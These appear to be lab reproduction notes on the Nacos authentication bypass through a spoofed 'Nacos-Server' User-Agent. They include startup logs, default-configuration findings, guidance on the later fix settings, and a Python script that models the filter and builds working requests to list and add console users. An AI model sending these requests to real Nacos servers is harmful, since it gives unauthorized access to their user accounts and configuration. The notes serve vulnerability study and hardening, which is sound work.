Download:
- https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.zip
Vulnerability references:
- https://github.com/alibaba/nacos/issues/4593
- https://github.com/alibaba/nacos/blob/3d97e36785f099ea99d559fae91e9d80a3b0c320/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78
- https://github.com/alibaba/nacos/blob/3d97e36785f099ea99d559fae91e9d80a3b0c320/sys/src/main/java/com/alibaba/nacos/sys/env/Constants.java#L63
Install and start (standalone mode, Windows):
cd nacos\bin
.\startup.cmd -m standalone
Startup output:
PS C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\bin> .\startup.cmd -m standalone
"nacos is starting with standalone"
[Nacos ASCII banner] Nacos 2.0.0-ALPHA.1 / Running in stand alone mode, All function modules / Port: 8848 / Pid: 4132 / Console: http://192.168.150.1:8848/nacos/index.html / https://nacos.io
2020-12-31 11:23:02,647 INFO Bean 'org.springframework.security.access.expression.method.DefaultMethodSecurityExpressionHandler@66c61024' of type [org.springframework.security.access.expression.method.DefaultMethodSecurityExpressionHandler] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)
2020-12-31 11:23:02,653 INFO Bean 'methodSecurityMetadataSource' of type [org.springframework.security.access.method.DelegatingMethodSecurityMetadataSource] is not eligible for getting processed by all BeanPostProcessors (for example: not eligible for auto-proxying)
2020-12-31 11:23:04,338 INFO Tomcat initialized with port(s): 8848 (http)
2020-12-31 11:23:05,372 INFO Root WebApplicationContext: initialization completed in 9221 ms
2020-12-31 11:23:18,819 INFO Initializing ExecutorService 'applicationTaskExecutor'
2020-12-31 11:23:18,932 INFO Adding welcome page: class path resource [static/index.html]
2020-12-31 11:23:19,576 INFO Creating filter chain: Ant [pattern='/**'], []
2020-12-31 11:23:19,622 INFO Creating filter chain: any request, [org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter@701a32, org.springframework.security.web.context.SecurityContextPersistenceFilter@a8a8b75, org.springframework.security.web.header.HeaderWriterFilter@412c995d, org.springframework.security.web.csrf.CsrfFilter@6b9c69a9, org.springframework.security.web.authentication.logout.LogoutFilter@51e37590, org.springframework.security.web.savedrequest.RequestCacheAwareFilter@72be135f, org.springframework.security.web.servletapi.SecurityContextHolderAwareRequestFilter@2e647e59, org.springframework.security.web.authentication.AnonymousAuthenticationFilter@39aa45a1, org.springframework.security.web.session.SessionManagementFilter@4dd94a58, org.springframework.security.web.access.ExceptionTranslationFilter@30b9eadd]
2020-12-31 11:23:19,858 INFO Initializing ExecutorService 'taskScheduler'
2020-12-31 11:23:19,878 INFO Exposing 16 endpoint(s) beneath base path '/actuator'
2020-12-31 11:23:20,012 INFO Tomcat started on port(s): 8848 (http) with context path '/nacos'
2020-12-31 11:23:20,016 INFO Nacos Log files: C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\logs
2020-12-31 11:23:20,016 INFO Nacos Log files: C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\conf
2020-12-31 11:23:20,017 INFO Nacos Log files: C:\Users\Administrator\Downloads\nacos-server-2.0.0-ALPHA.1\nacos\data
2020-12-31 11:23:20,017 INFO Nacos started successfully in stand alone mode. use embedded storage
After logging in, the console looks like this (the screenshots are not preserved in these notes).
In conf/application.properties the auth switch nacos.core.auth.enabled defaults to false, i.e. authentication is off:
by default anyone can list the configured users (usernames and stored password hashes) and add users,
and a newly added user can log in straight away.
After manually changing it to true and restarting, the same unauthenticated requests return 403.
Adding this header:
User-Agent: Nacos-Server
bypasses authentication again: the AuthFilter referenced above treats any request whose User-Agent starts with Nacos-Server (Constants.NACOS_SERVER_HEADER) as a cluster-internal call and skips the token check entirely, so it is a prefix match, not an exact one.
Caveat: the fix for issue #4593 (Nacos 1.4.1 and later) turns that whitelist into a compatibility switch, nacos.core.auth.enable.userAgentAuthWhite, which should stay false, and identifies peer servers with the nacos.core.auth.server.identity.key / nacos.core.auth.server.identity.value headers instead; the values shipped in the default application.properties (serverIdentity / security) must be changed to a site-specific secret, otherwise any client that knows the defaults is still treated as a peer.
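To make the bypass condition concrete, here is an added example (written for these notes, not code from the Nacos project). The two filter functions are a Python paraphrase of the decision made by the referenced AuthFilter.java before and after the fix; the token check is simplified to "token is in a known-good set", and the post-fix setting names (userAgentAuthWhite, server identity key/value) are the ones from later Nacos application.properties files. The request builders target the console user endpoint /nacos/v1/auth/users; the address 192.168.150.1:8848 is the one from the startup banner above and is only used when the script is run directly.

```python
"""Model of the Nacos User-Agent auth bypass plus probe requests.

Added example: the editor's own paraphrase of AuthFilter.java, not Nacos code.
Assumed: token validity is modelled as set membership; post-fix setting names
follow nacos.core.auth.enable.userAgentAuthWhite and
nacos.core.auth.server.identity.key/value.
"""
from dataclasses import dataclass, field
import urllib.error
import urllib.parse
import urllib.request

NACOS_SERVER_UA = "Nacos-Server"          # value of Constants.NACOS_SERVER_HEADER
USERS_PATH = "/nacos/v1/auth/users"       # console user-management endpoint


@dataclass
class Server:
    """Server-side settings relevant to the decision (assumed names, see lead-in)."""
    auth_enabled: bool = False            # nacos.core.auth.enabled, default false
    valid_tokens: set = field(default_factory=set)
    user_agent_auth_white: bool = False   # nacos.core.auth.enable.userAgentAuthWhite
    identity_key: str = ""                # nacos.core.auth.server.identity.key
    identity_value: str = ""              # nacos.core.auth.server.identity.value


def _has_valid_token(srv, headers, params):
    """Simplified token check: accessToken param or Bearer header in the known set."""
    auth = headers.get("Authorization", "")
    token = params.get("accessToken") or (auth[7:] if auth.startswith("Bearer ") else "")
    return bool(token) and token in srv.valid_tokens


def vulnerable_filter(srv, headers, params):
    """Pre-fix AuthFilter: a User-Agent that merely *starts with* 'Nacos-Server'
    is treated as a cluster peer and the token is never checked. Returns HTTP status."""
    if not srv.auth_enabled:
        return 200
    if headers.get("User-Agent", "").startswith(NACOS_SERVER_UA):
        return 200                        # the bypass
    return 200 if _has_valid_token(srv, headers, params) else 403


def fixed_filter(srv, headers, params):
    """Post-fix behaviour: the UA whitelist is off unless an operator re-enables
    it, and peers must present the configured identity header instead."""
    if not srv.auth_enabled:
        return 200
    if srv.user_agent_auth_white and headers.get("User-Agent", "").startswith(NACOS_SERVER_UA):
        return 200                        # still bypassable if the switch is turned back on
    if srv.identity_key and headers.get(srv.identity_key) == srv.identity_value:
        return 200                        # peer authenticated by shared secret header
    return 200 if _has_valid_token(srv, headers, params) else 403


def build_list_users(base_url, bypass):
    """GET the user list; with bypass=True the spoofed User-Agent is sent."""
    url = base_url.rstrip("/") + USERS_PATH + "?pageNo=1&pageSize=9"
    ua = NACOS_SERVER_UA if bypass else "Mozilla/5.0"
    return urllib.request.Request(url, headers={"User-Agent": ua})


def build_add_user(base_url, username, password):
    """POST that creates a console user under the spoofed User-Agent; this is what
    turns the information leak into persistent console access."""
    data = urllib.parse.urlencode({"username": username, "password": password}).encode()
    return urllib.request.Request(base_url.rstrip("/") + USERS_PATH, data=data,
                                  headers={"User-Agent": NACOS_SERVER_UA}, method="POST")


def probe(base_url):
    """Send the user-list request without and with the spoofed UA and return the
    two status codes; (403, 200) means auth is enabled but bypassable."""
    codes = []
    for bypass in (False, True):
        try:
            with urllib.request.urlopen(build_list_users(base_url, bypass), timeout=5) as resp:
                codes.append(resp.status)
        except urllib.error.HTTPError as err:
            codes.append(err.code)
    return tuple(codes)


if __name__ == "__main__":
    # Address taken from the startup banner in these notes.
    print(probe("http://192.168.150.1:8848"))
```

probe() only compares two status codes and sends nothing state-changing; build_add_user() is there to show the request shape that follows once the bypass is confirmed. Note in the model that a User-Agent like "Nacos-Server/1.4" passes too, because the original check is a prefix match.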
SkyWalking references:
- http://www.itmuch.com/skywalking/dynamic-configuration/
- https://skyapm.github.io/document-cn-translation-of-skywalking/zh/8.0.0/setup/backend/dynamic-config.html
- https://github.com/apache/skywalking/pull/6098/commits/2f72539f7b57c9b3cf6870e5b6f6972783413900
- https://github.com/apache/skywalking/pull/6098/files